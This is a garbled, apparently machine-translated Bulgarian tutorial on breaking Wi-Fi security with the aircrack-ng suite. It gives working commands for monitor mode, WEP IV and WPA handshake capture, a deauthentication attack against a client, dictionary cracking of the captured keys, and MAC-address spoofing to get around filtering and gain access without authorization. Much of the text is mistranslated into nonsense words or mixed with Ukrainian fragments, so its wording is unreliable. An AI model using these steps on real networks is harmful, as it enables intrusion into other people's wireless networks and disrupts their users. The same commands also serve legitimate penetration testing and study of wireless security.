Според нас, както се вижда от екрана за печат (фиг. 10), интерфейсът ath1бъде в режим на наблюдение ( Режим: Монитор), а MAC адресите на нашата свързана карта са 00:14:78:ed:d6:d3. написа Точка за достъп: 00:14:78:ed:d6:d3 bentejiti не носи отговорност за тази випадка. Очевидно адаптерът не е точка за достъп, но в режим на наблюдение (скачане на пакети) той действа като точка за достъп.

Ориз. 10. Преглед на информация за интерфейса
за помощ с командата iwconfig

В крайна сметка е важно, че след допълнителната подобна процедура за настройка на външния бездротови адаптер (прехвърляне на адаптера в режим на наблюдение) ще бъдат коригирани други външни адаптери, базирани на други чипове. Вярно е, че в този случай именуването на интерфейс без root ще бъде различно.

Повторно нарязване на торби

Освен това, тъй като е взета цялата необходима информация за оразмеряването, можете да преминете към етапа на преопаковане на опаковките. За когото помощната програма airodump-ng е нова, защитете синтаксиса на командата airodump-ng vzhe іnshiy i лъжа в типа на криптиране.

Освен това, ако WEP-криптирането е криптирано в мярката, е необходимо да се преработят само пакетите, за да се изчисти векторът за инициализация (IV-пакети) и да се запишат във файл, който ще бъде победител при избора на ключа .

Ако WPA-PSK-криптирането е в застой в Merezha, е необходимо да прескачате пакети, които имат информация за процедурата за удостоверяване на клиента в Merezha (процедура за ръкостискане).

Wipadok WEP криптиране

На гърба можем да разгледаме опцията, ако WEP криптирането е активирано на merezhі. Както беше планирано, понякога трябва да филтрираме по-малко пакети, за да можем да почистим вектора за инициализация (IV-пакети) и да ги запишем във файла.

Ако фрагментите на атакуваното сливане са на ниво 802.11g и WEP криптирането е в застой в него и предаването се извършва по 12-ия канал, тогава командният синтаксис за прескачане на пакети може да бъде обиден (div. Таблица 2):

airodump-ng --ivs --band g --канал 12 --write dump wlan0

В този случай се избират само IV-пакети, за да могат да бъдат записани във файла с имената изхвърлям, а пресичането на канала се извършва на 12-ти канал. Параметър - ивицапоказва тези, които са победили срещу стандарта 802.11g, и параметъра wlan0определя името на интерфейса в режим на наблюдение. IN това дупеСъобщава се, че адаптерът Intel 3945ABG без дрото е в застой.

С уважение, когато записвате пакети, на файла youmu автоматично се дава разширение ivs(в момента на избор на IV-пакети). Ако зададете име на файл с прескачани пакети, можете да посочите само име на файл или да напишете нов път към файла. Ако не посочите име за файла, файлът ще бъде създаден в работната директория на програмата. Прикладът на победната команда, ако следващия път е записан във файла, тогава ще дойдем:

airodump-ng --ivs --band g --канал 12

--напишете /mnt/sda1/dump wlan0

Чието досие за кандидатстване dump.ivsще бъде създаден в директорията /mnt/sda1. Прехвърляйки към базирания на Windows език, създаваме файла dump.ivs на твърдия диск на главната директория C:\.

Необходимо е да се отбележи, че не само разширението, но и номерацията на файловете се добавя автоматично към файловете на опакованите пакети. Например, ако изпълните командата първо за изхвърляне на пакети от дъмп файла, този файл ще бъде записан под името dump-01.ivs. При друго стартиране на дъмп файла dump-02.ivs ще му бъде дадено име dump-02.ivs.

По принцип, все едно си забравил, деограбвайки спестяванията си, имаш досие за прекомерно натрупване, просто трябва да знаеш. Унищожи отбора mc, и стартирайте обвивка с надпис Norton Commander. С помощта (чрез клавиша F9) е лесно да разберете местоположението на всеки файл.

След като въведете в командния ред команда за рециклиране на пакети, адаптерът без droto по-често ще рециклира пакети и ще ги записва от файл с индикации(фиг. 11). При произволен брой прескочени пакети, той се показва интерактивно в помощната програма airodump-ng и за да стартирате процеса, просто натиснете клавишната комбинация Ctrl + C.

Ориз. 11. Запазване на IV-пакети за помощ на помощната програма airodump-ng по това време
WEP криптиране

Іmovirnіst успешен избор на ключа да легне в зависимост от количеството натрупани IV-paktіv и дълготрайността на ключа. По правило при дължина на ключа от 128 бита е достатъчно да се натрупат около 1-2 милиона IV-пакета, а с дължина на ключа от 64 бита - около десетстотин хиляди пакета. Ключът обаче не е известен предварително и помощната програма не позволява да бъде присвоен. Следователно, за анализ е необходимо да се прехвърлят поне 1,5 милиона пакета.

Когато използвате различен адаптер без droto, базиран на чип Atheros, алгоритъмът за превключване на пакети е същият, но, разбира се, за екипа airodump-ngтрябва да бъде посочен като интерфейс на параметър ath1.

Необходимо е да се посочи, че за събиране на пакети е ефективно да се инсталира интеграцията на безжичния адаптер Intel 3945ABG. При същата интензивност на трафика, скоростта на събиране на пакети с различен адаптер Intel 3945ABG е по-висока, по-ниска с адаптер, базиран на чип Atheros. В същото време е важно, че ситуацията е известна (те не са описани в света), ако е невъзможно да се победи адаптерът Intel 3945ABG.

Когато пакетите се преливат, ситуацията често се обвинява, ако има интензивен обмен на трафик между точката за достъп и клиента, тогава, за да се натрупат голям брой пакети, което е необходимо за успешна мярка за зло, тя ще вземете повече от един чек. В литературата често е възможно да се обясни, че процесът на събиране на пакети може да бъде ускорен, сякаш базираният на primus клиент трябва да се свърже с точката за достъп с помощта на помощната програма aireplay-ng. По-важното е, че аспектите на използването на тази помощна програма са далеч, но за момента е важно, че е абсолютно неефективно спирането на IV-пакети за насърчаване на трафика. Vlasne, едва ли ще ти помогне. Ако клиентът е неактивен и няма натоварен трафик между точката за достъп и клиента, тогава единственото, което остава, е проверката. А хакването на помощната програма airodump-ng е безпроблемно. Освен това няма да работи с адаптера Intel 3945ABG (обърнете внимание стрийминг версия) този тест трябва да бъде спрян, докато лаптопът замръзне.

Wipadok WPA криптиране

С WPA-криптиран в безжична мрежа алгоритъмът за прескачане на пакети е по-малък. В този случай не е необходимо да филтрираме IV-пакети, фрагментите с WPA-криптиран їx просто не работят, но нямаме смисъл да улавяме всички пакети. Е, всичко, което е необходимо, е малка част от трафика между точката за достъп и клиента без dart мрежа, като в този случай е изпратена информацията за процедурата за удостоверяване на клиента в мрежата (handshake procedure). Но за да преминем през процедурата за удостоверяване на клиента в mezhі, е необходимо да инициираме primus. Първата ос тук се нуждае от помощта на помощната програма aireplay-ng.

Тази помощна програма е разпозната за извършване на редица видове атаки върху точката за достъп. Zocrema, за нашите цели е необходимо да ускорим атаката за деаутентификация, така че да доведе до отваряне на данните между точката за достъп и клиента от обидната процедура по установяване на данните.

Също така е важно, че драйверите не са за всички чипове без droto адаптери в комбинация с помощната програма aireplay-ng и факта, че адаптерът може да работи в режим на наблюдение, така че е възможно с команди airmon-ngі airodump-ngвсе още не гарантирам, че ще бъдете умен с екипа airplay-ng.

Що се отнася до вашия адаптер и драйвери без droto, комбинирани с помощната програма aireplay-ng, вие сте късметлия, парчетата по различни начини и помощната програма изглежда просто незаменима.

Освен това, ако се използва WPA криптиране, ще бъде наличен алгоритъмът за прескачане на пакети. VІDKRIVAєMO DVI CONSOLONI CESION І IN PERSHІY CESI LAUM ВОДЕЩА УСЛУГА НА PRIMUSOVY Rosennunya Merezhіi zeilsuyu идентификацияюююНТА (Utilіta Aireplay-NG, Attack Deautentifіkatsії), и в една или две секунди стартиране на Pause.

В отбора airplay-ng zastosovuetsya обиден синтаксис:

airplay-ng

Тази команда може да има много различни опции, които можете да разберете, като изпълните командата без параметри.

За нашите цели синтаксисът на командата изглежда така:

aireplay-ng -e ComputerPress -a 00:18:c7:04:5e:65

-c 00:19:e0:82:20:42 --deauth 10 ath1

Кой има параметъра -e ComputerPresзадайте идентификатор ( ESSID) мережи без стрели; параметър -a 00:18:c7:04:5e:65- MAC адрес на точката за достъп; параметър -c 00:19:e0:82:20:42- MAC-адреси на клиента на безжичната мрежа; опция --смърт 10- атака при отваряне на плащането (десет пъти по-късно) с дистанционно удостоверяване на клиента, и ath1избира интерфейса, който има режимът за наблюдение.

При заявка за тази команда десет пъти по-късно ще се извърши процедурата за отваряне на връзката на клиента с точката за достъп с разширената процедура за удостоверяване (фиг. 12).

Ориз. 12. Анти-клиентски атаки за деаутентификация
aireplay-ng помощни уикита

За командата за превключване на пакети, когато WPA криптирането е спряно, можете да използвате следния синтаксис:

airodump-ng --band g --канал 12

--write /mnt/sda1/WPAdump ath1

Обърнете внимание на синтаксиса на командата airodump-ngдневен филтър на IV-опаковки ( --ivs). На файла WPAdump автоматично ще бъде присвоен пореден номер и разширение *.cap. И така, при първото стартиране на командата, файлът от опакованите пакети ще бъде сортиран в директорията /mnt/sda1Ще ви бъде дадено името WPAdump-01.cap.

Процесът на погребване на пакетите продължава само няколко секунди, но когато се активира активирането на атаката за деаутентификация, заетостта на пакетите за ръкостискане е практически стовидкова (фиг. 13).

Ориз. 13. Процесът на изхвърляне на пакети с помощта на помощната програма airodump-ng
при стартиране на атака за деаутентификация

Анализ на пакета

В останалата част от етапа се извършва анализ на хакната информация за допълнителната помощна програма aircrack-ng. По време на WEP криптиране възможността за избор на ключ се съхранява в броя на избраните IV-пакети, а при WPA/WPA2 криптиране се избира под формата на речник.

Очевидно синтаксисът на командата aircrack-ngразлични за WEP и WPA-PSK криптиране. Блестящият синтаксис на командата за атака е:

aircrack-ng

Възможните опции за команди са представени в таблицата. 3 . Важно е, че като файлове за премахване на пакети (файлове за заснемане) можете да посочите разширение на файла *.cap или *.ivs. Освен това, ако WEP криптирането е компрометирано, помощните програми airodump-ng и aircrack-ng могат да работят един час (две сесии на конзолата спират). Когато екипът aircrack-ngавтоматично актуализиране на базата данни за IV-пакети.

Wipadok WEP криптиране

Когато WEP криптирането е обърнато, основният проблем се крие във факта, че не знаем стойността на ключа, който трябва да бъде криптиран за криптиране, и няма начин да го знаем. Следователно можете да опитате да подредите броя на опциите за ключа, тъй като той е зададен от параметъра . Ако този параметър не е посочен, тогава след заключване дължината на ключа се задава на 104 бита ( -n 128).

Ако имате нужда от информация за самия ключ (например можете да добавите само цифри, или само букви, или само набор от букви и цифри, но не и да избягвате специални символи), тогава можете да ускорите опциите -от, і -h.

В нашия случай за избор на ключа спечелихме командата aircrack-ngв обидния синтаксис:

aircrack-ng -a 1 -e ComputerPress -b 00:18:c7:04:5e:65

-m 00:19:e0:82:20:42 -n 128 /mnt/sda1/dump-01.ivs

Тук победи бяха въвеждането на MAC адреса на точката за достъп на този клиент, както и ESSID на мрежата и изтеглянето, само една точка за достъп и един безжичен клиент. За това можете също да застосоввате команда:

aircrack-ng -a 1 -n 128 /mnt/sda1/dump-01.ivs

Ако обаче сте клиент или точка за достъп, трябва да посочите тези параметри.

В резултат на това успяхме да вземем 128-битов ключ за по-малко от 3 секунди (малки 14)! Всъщност злото криптиране, базирано на WEP, не е сериозен проблем, но, както вече посочихме, в този час WEP криптирането на практика не се застосува чрез йога.

Ориз. 14. Вземете 128-битов ключ за допълнителната помощна програма aircrack-ng

Wipadok WPA криптиране

По време на WPA-PSK-криптиране се използва речник за избор на парола. Ако паролата е в речника, тя ще бъде взета - това е само въпрос на време. Ако няма парола в речника, тогава няма да можете да я знаете.

Програмата aircrack-ng има официален речник password.lst, а списъците са в директорията /pentest/wireless/aircrack-ng/test/. Prote wine е твърде малко и има по-малко английски думи. Лесността да можете да ви даде парола за помощта на този речник е дори малка, така че е по-добре да свържете нормален речник. Създадохме речник password.lst в директорията /mnt/sda1/ за нашия ум.

Когато са свързани, следващите речници трябва да запомнят, че смърдовете могат да бъдат разширени *.lst. Ако изберете речника от разширението *.dic, просто го променете.

Голяма селекция от добри думи можете да намерите на www.insidepro.com. Ако искате да изпишете всички речници, тогава трябва да ги комбинирате в един речник, който може да се нарече например password.lst.

Ако речниците не помогнат, тогава, по-добре за всичко, паролата е тъп набор от символи или комбинация от символи и цифри. Все пак речниците могат да заменят думи или фрази, както и удобни клавишни комбинации, които лесно се забравят. Очевидно всеки ден в речниците има голям брой символи. Ale navіt at tsomu vipadku vyhіd є. Помощните програми на Deakki, разпознати за избор на пароли, могат да генерират речници от даден набор от символи, когато са присвоени максимално времедуми. Дупето на такава програма е програмата PasswordPro v.2.4.2.0. (www.insidepro.com).

По-късно, за избора на пароли, се втурнахме напред с обидна команда:

aircrack-ng -a 2 -e ComputerPress -b 00:18:c7:04:5e:65

-w /mnt/sda1/password.lst /mnt/sda1/WPAdump-01.cap,

де -а 2- Посочете дали WPA-PSK криптирането трябва да бъде криптирано; -e ComputerPres- Посочете, че идентификационният номер на сливането на ComputerPress; -b 00:18:c7:04:5e:65- Посочете MAC адреса на точката за достъп; -w /mnt/sda1/password.lstпокажете пътя към речника; /mnt/sda1/WPAdump-01.capПокажете пътя до файла.

В нашия случай ние застосовували 60 MB речник с обем 60 MB и можехме да вземем паролата, за да я получим бързо (фиг. 15). Вярно е, знаехме, че паролата е в речника, така че паролата беше взета повече от веднъж.

Ориз. 15. Извличане на WPA-PSK парола за допълнителна помощна програма aircrack-ng

Тим не е по-малко, още веднъж е важно, че възможността за промяна на зла WPA-PSK парола с помощта на речник е близка до нула. Ако паролата на задачите е над вида на дума и ако е комбинация от букви и цифри, тогава е невъзможно да я вземете. Освен това е необходимо да се излъже, че програмата aircrack-ng има само един метод за работа с речник - методът на грубата сила. И така умни начиниработа с речник, като реверберация на двойника на написана дума, реверберация добър редсимволите на думата, замяната на латинското оформление, за съжаление, не се прехвърлят. Очевидно всичко може да бъде имплементирано в предстоящите версии на програмата, но в такъв случай ефективността на селекцията за речника ще бъде ниска.

Ако е практически невъзможно да отворите WPA-криптирането, нека го разбием малко.

Паролите, например, миришат в сгъваем набор от знаци, извикват максимум от 5 до 15 знака. Коженият символ може да бъде една от 52 (с подобрен регистър) букви от английската азбука, една от 64 (с подобрен регистър) букви на руската азбука и една от 10 цифри. Освен това можете да промените и специалните знаци. Очевидно можете да предположите, че специалните символи не са уникални и паролите се въвеждат от буквите на английската азбука и цифри. Но можете да въведете една от 62-те опции, за да въведете символ във всеки тип кожа. Ако паролата е повече от 5 знака, броят на възможните комбинации в склада е 625 = 916132832, а размерът на такъв речник ще бъде повече от 2,6 GB. С дължина на паролата от 10 знака, броят на възможните комбинации в склада вече е 8,4 1017, а размерът на речника е приблизително 6 милиона Tbytes. Ако смятате, че скоростта на изброяване на възможни пароли за речник не е много по-висока и по-скъпа е приблизително 300 пароли в секунда, тогава виждаме, че такъв речник се нуждае от 100 милиона години, за да изброи всички възможни пароли!

Защита на байпас филтър за MAC адреси

В началото забелязахме, че WEP- и WPA-PSK криптиране често се използва и такива функции, като режима на верижния идентификатор на сливане и филтриране зад MAC-адреси. Вонята пее да лежи на функциите на охраната на сигурността на растението без стрели.

Както вече демонстрирахме на примера с пакета aircrack-ng, не можете да разчитате на режима на идентификатора на веригата на връзката. Помощната програма airodump-ng все още ще ви показва ESSID на сливането, който можете да изберете, за да създадете (неоторизиран!) профил на връзка към обединяването.

Е, ако говорите за такъв метод за сигурност, като филтриране за MAC адреси, тогава този запис на трета страна не е много ефективен. Tse svogo нещо като закхист като глупак, който може да се сравни с автомобилни аларми.

В интернет можете да намерите много различни помощни програми под Windows, които ви позволяват да промените MAC адреса на мрежовия интерфейс. Как може да се насочи дупето безценна полезност MAC грим (www.gorlani.com/publicprj/macmakeup/macmakeup.asp).

След като промените MAC адреса, можете да се преструвате на свой собствен и да реализирате неоторизиран достъп до безжичната мрежа. Освен това, обидните клиенти (правилни и грешни) ще се свържат абсолютно спокойно по същия начин със същия MAC адрес, освен това на грешния гост ще бъде присвоен същият IP адрес, както на най-малкия правилен клиент.

Различните Linux системи не се нуждаят от общи помощни програми. Достатъчна в командната конзола на viconate е последователността от офанзивни команди:

ifconfig wlan0 надолу

ifconfig wlan0 hw ether [новMAC-адреси]

ifconfig wlan0 up

Първата команда за активиране на интерфейса wlan0, приятел - задаване на интерфейс wlan0нови MAC-адреси, а третият - включва интерфейса wlan0.

Когато разпространението на BackTrack е спряно, можете да ускорите MAC адреса с командата macchanger. За да замените MAC адреса, следният синтаксис е обърнат:

ifconfig wlan0 надолу

macchanger -m [новMAC-адреси]wlan0

ifconfig wlan0 up

Можете да спечелите отбора macchangerс параметър -r (macchanger -r wlan0) - интерфейсът wlan0 ще има свой собствен MAC адрес, присвоен му.

Висновки

Отново, не е лесно да се поправи цялата система за сигурност на безжична система за сигурност, базирана на WEP криптиране. В същото време трябва да се отбележи, че протоколът WEP вече е морално остарял и практически не е победител. Deisno, какъв смисъл да създаваш в безжична мрежа в WEP-криптирането, като всички безжични точки за достъп, които мрежести адаптериподдържа WPA/WPA2-PSK криптиране? И че rozrahhovuvati, scho отидете да знаете такъв дългогодишен mezhe, да не се доведе.

Със зла мрежа, де zastosovuetsya WPA-криптиране, нали, с погледа на нападателя, е безнадеждно да се досит. При избора на парола е достатъчно да комбинирате цифри и букви от горния и долния регистри - и речникът няма да помогне. Практически е невъзможно да се промени такава парола.

Описание на airmon-ng

airmon-ng - това е bash скрипт, творения за конвертиране на карти без droto в режим на гледане.

Лиценз: GPLv2

Airmon-ng накрайник

Виктория:

airmon-ng <интерфейс>[честота на канала chi]

Помощник за Airmon-ng

СИНОПСИС

airmon-ng <интерфейс>[канал] airmon-ng

OPIS

airmon-ng - това е скрипт, който може да бъде настроен, за да активира режим на наблюдение на безжичен интерфейс. Vіn може да се използва и за превключване от режима на предпазливост към режима на кератинизация. Въвеждането на командата airmon-ng без параметри показва състоянието на интерфейсите. Можете да въведете списък / устройство в програми, за да можете да влезете в картата без root и също да зададете dzherel /etc/kismet/kismet.conf.

НЕОБХОДИМИ ЕЗИКОВИ ПАРАМЕТРИ

започнете<интерфейс>[канал]

Активирайте режима за наблюдение на интерфейса (и задайте канала).

проверете

Списък с програми, които могат да бъдат свързани към безжична карта. Ако кажете "убийте", тогава ще бъде счупен, за да се опитате да ги закарате.

Кандидатствайте, за да стартирате Airmon-ng

Нека разгледаме наличните интерфейси:

Sudo airmon-ng PHY интерфейсен драйвер чипсет phy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev. 24)

Ние преглеждаме процесите, каквито могат да ни направят

Sudo airmon-ng проверка Намерени са 5 процеса, yakі могат да viklikati риск. Подобно на спиране на airodump-ng, aireplay-ng или airtun-ng, след кратък период от време можете да бъдете в обсега им! Име на PID 799 NetworkManager 894 wpa_supplicant 905 dhclient 1089 avahi-daemon 1090 avahi-daemon

Преди да преминем в режим на охрана, караме в процеса, за да можем да попитаме:

sudo airmon-ng check kill процес на убиване: PID име 894 wpa_supplicant 905 dhclient

Опитваме се да поставим интерфейса на wlan0 в режим на наблюдение:

Sudo airmon-ng start wlan0 PHY интерфейсен драйвер чипсет phy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24) (mac80211 режим на монитор vif активиран за wlan0 на wlan0mon)

Проверете дали безжичната карта е превключена в режим на наблюдение:

sudo iwconfig eth0 не е безжични разширения. wlan0mon IEEE 802.11 Режим: Честота на монитора: 2,457 GHz Tx-Power=20 dBm Кратка граница на повторния опит: 7 RTS thr:off Fragment thr:off Управление на захранването: изключено не за разширения без дромове.

Картата Мережева промени името на интерфейса и премина в режим на монитор, внимавайте (за да проверите реда Монитор).

Преминаване към режим на ядро

sudo airmon-ng stop wlan0mon PHY интерфейсен драйвер чипсет phy0 wlan0mon rt2800usb Ralink Technology, Corp. RT3572 (виф режимът на mac80211 станция активиран на wlan0) (режимът на монитор на mac80211 vif е деактивиран за wlan0mon)

Алтернативен начин за превключване към режим на наблюдение

Можеш да спечелиш алтернативапрехвърляне на бездромния интерфейс в режим Watchdog:

sudo ifconfig wlan0 надолу sudo iwconfig wlan0 режим монитор sudo ifconfig wlan0 нагоре

Або в един ред

sudo ifconfig wlan0 надолу && sudo iwconfig wlan0 режим монитор && sudo ifconfig wlan0 нагоре

проверим

sudo iwconfig eth0 не е безжични разширения. wlan0mon IEEE 802.11abgn Режим: Честота на монитора: 2,457 GHz Tx-Power=15 dBm Повторен опит късо ограничение: 7 RTS thr:off Fragment thr:off Управление на захранването:изключено не могат да безжични разширения.

Всичко мина добре - обединяващата се карта беше превключена в режим на охрана (за да проверите реда Режим: Монитор).

Преминаване към режим на Кернинг:

ifconfig wlan0 надолу iwconfig wlan0 режим управлява ifconfig wlan0 нагоре

Превключване към режим на наблюдение за допълнителни команди ip и iw

команда ifconfigі iwconfigпризнанието е остаряло. Ето защо, ако искате предишният метод, както преди, да работи по чудо, е на разположение алтернативно изпълнение на йога с помощта на нови програми. Знайте името на интерфейса без droto:

Sudo iw dev phy#0 Интерфейс wlan0 ifindex 5 wdev 0x3 addr 5a:88:f2:f6:52:41 тип управляван txpower 20,00 dBm

sudo IP връзка набор<ИНТЕРФЕЙС>надолу sudo iw<ИНТЕРФЕЙС>задайте контрол на монитора sudo ip link set<ИНТЕРФЕЙС>нагоре

подмяна<ИНТЕРФЕЙС>на името на deisne на вашия интерфейс без droto (имам wlan0):

sudo ip link set wlan0 down sudo iw wlan0 set monitor sudo ip link set wlan0 up

В BlackArch (моят интерфейс wlp2s0), последователността от команди изглежда така:

sudo ip link set wlp2s0 down sudo iw wlp2s0 set monitor control sudo ip link set wlp2s0 up

Команда на един ред:

sudo ip link set wlp2s0 down && sudo iw wlp2s0 set monitor control && sudo ip link set wlp2s0 up

Следващият страхотен екип е сам виновен за обозначаването на интерфейса без droto и прехвърлянето на йога в режим на наблюдение:

T=`sudo iw dev | grep "Интерфейс" | sed "s/Interface //"`;sudo ip link set $t down && sudo iw $t set monitor control && sudo ip link set $t up

Преминаване към режим на Кернинг:

sudo IP връзка набор<ИНТЕРФЕЙС>надолу sudo iw<ИНТЕРФЕЙС>набор тип управлявана sudo ip връзка набор<ИНТЕРФЕЙС>нагоре

За интерфейс wlan0истинските команди изглеждат така:

sudo ip link set wlan0 down sudo iw wlan0 set type управляван sudo ip link set wlan0 up

NetworkManager Променя картата без ядро ​​в режим на защита

За пеещи умове NetworkManager не може да даде WiFi адаптерпревключете в режим на наблюдение. Нещо повече, вече прехвърлена в режим на монитор, картата без дрото може да се превърне в режим на кардиране. Затова се препоръчва да включите NetworkManager за един час тестване за проникване на мрежи без стрели.

На Kali Linux и BlackArch работи по следния начин:

Sudo systemctl спре NetworkManager

Имайте предвид, че ако NetworkManager е включен, интернет се губи!

Технологии